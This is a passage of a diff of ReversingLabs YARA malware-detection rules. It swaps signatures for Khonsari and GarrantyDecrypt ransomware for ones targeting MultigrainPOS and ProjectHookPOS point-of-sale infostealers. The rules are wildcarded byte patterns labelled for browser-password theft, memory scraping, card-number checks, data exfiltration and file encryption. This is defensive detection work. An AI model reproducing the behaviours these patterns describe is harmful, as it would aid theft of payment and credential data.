?? 4C 8B 45 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8D 45 ?? 49 3B 56 ?? + 74 ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8B C2 49 8B CE E8 ?? ?? ?? ?? 49 81 46 ?? ?? ?? + ?? ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 + F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 6D ?? 48 C7 45 ?? + ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 + 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 + FF 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 + 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? + ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 + ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? + ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 90 49 8B C6 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? + ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 } condition: - uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ($import_key) and ($encrypt_files) + uint16(0)==0x5A4D and (($network_communication) and ( all of ($find_sensitive_files_p*)) and ( all of ($parse_firefox_configuration_p*)) and ( all of ($collect_browser_passwords_p*)) and ( all of ($collect_cookies_p*))) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Khonsari ransomware." + description = "Yara rule that detects MultigrainPOS infostealer." author = "ReversingLabs" - id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da" - date = "2022-01-27" - modified = "2022-01-27" + id = "595c04af-802f-556d-b22b-23cac79b256e" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Khonsari" + tc_detection_type = "Infostealer" + tc_detection_name = "MultigrainPOS" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? - 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B - 16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? - ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09 - 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11 - ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ?? - ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F - ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? - ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? - 28 ?? ?? ?? ?? 26 2A + $data_exfiltration_v10_1 = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F + 43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 + FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? + FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB } - $get_key = { - 73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 - ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D - ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? - ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ?? - ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 - ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A + $memory_scraping_v10_1 = { + 6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ?? + ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74 } - $encrypt_files = { - 28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20 - ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ?? - ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F - ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ?? - ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A + $process_search_v10_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D + 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 + } + $service_creation_v10_1 = { + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ?? + ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + FF 15 + } + $process_search_v11_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ?? + ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D + ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89 + 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ?? + ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66 + 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + } + $memory_scraping_v11_1 = { + 6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ?? + 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 + } + $data_exfiltration_v11_1 = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ?? + 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ?? + ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? + FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB + } + $service_creation_v11_1 = { + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ?? + ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 } condition: - uint16(0)==0x5A4D and ($find_files) and ($get_key) and ($encrypt_files) + uint16(0)==0x5A4D and (($data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1) or ($process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1)) } -rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects GarrantyDecrypt ransomware." + description = "Yara rule that detects ProjectHookPOS infostealer." author = "ReversingLabs" - id = "0aa05f06-1773-5ce8-892d-04468f5deccc" + id = "dcb96a99-c8c0-5878-a3a5-fe3cfeec43c6" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/infostealer/Win32.Infostealer.ProjectHookPOS.yara#L1-L98" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7534c9e905256aaf80f04b746a92c50689437b288f7e393ef13fde1740c4a4e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GarrantyDecrypt" + tc_detection_type = "Infostealer" + tc_detection_name = "ProjectHookPOS" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75 - ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? - 3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46 - ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ?? - ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45 - ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B - 45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8 - ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF - 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 + $calc_luhn = { + 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 + 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 C0 89 45 ?? 8B 45 ?? 85 C0 74 ?? 8B + D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? + 8B 00 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 85 C0 0F 94 C3 8B 45 ?? 85 C0 74 ?? 8B D0 + 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? 8B + 00 8B F0 85 F6 7E ?? BF ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B7 54 7A ?? E8 ?? ?? ?? ?? + 8B 45 ?? 83 CA ?? E8 ?? ?? ?? ?? 0F B6 D0 66 83 FA ?? 75 ?? C6 45 ?? ?? EB ?? 84 DB + 74 ?? 0F B6 C0 0F B6 80 ?? ?? ?? ?? 01 45 ?? EB ?? 0F B6 C0 01 45 ?? 80 F3 ?? 47 4E + 75 ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 75 ?? 80 7D ?? ?? 74 ?? 33 DB EB ?? B3 + ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? + ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C3 5F 5E 5B 8B E5 5D C3 } - $encrypt_files_p2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B - CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ?? - 8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ?? - ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? - ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ?? - 75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ?? - 3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45 - ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68 - ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B - C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41 - 89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8 - ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45 - ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52 - 50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81 - 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 - FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6 - 53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - 59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 + $track_1_reverse = { + 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 8B F1 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 33 D2 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? + 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 + ?? 8B 00 8B D8 83 FB ?? 7C ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? + ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 4B 85 DB 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? + ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5E 5B 59 59 5D C3 } - $find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85 - DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 - FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? - ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ?? - ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75 - ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83 - C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? - ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50 - 57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ?? - ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 + $check_validity_1 = { + 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 38 ?? 75 ?? + 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? + ?? 66 83 78 ?? ?? 0F 94 C0 EB ?? 33 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? + 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 78 ?? ?? 0F + 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 + ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 66 81 78 ?? ?? ?? 73 ?? 0F B6 40 ?? 0F B6 C0 0F A3 + 06 72 ?? 33 C0 EB + } + $encode_and_send_1 = { + 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B F0 8D 4D ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8B C6 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + C6 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B CB BA + ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 + } + $form_create_1 = { + 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 + ?? E8 ?? ?? ?? ?? 8B D0 8D 45 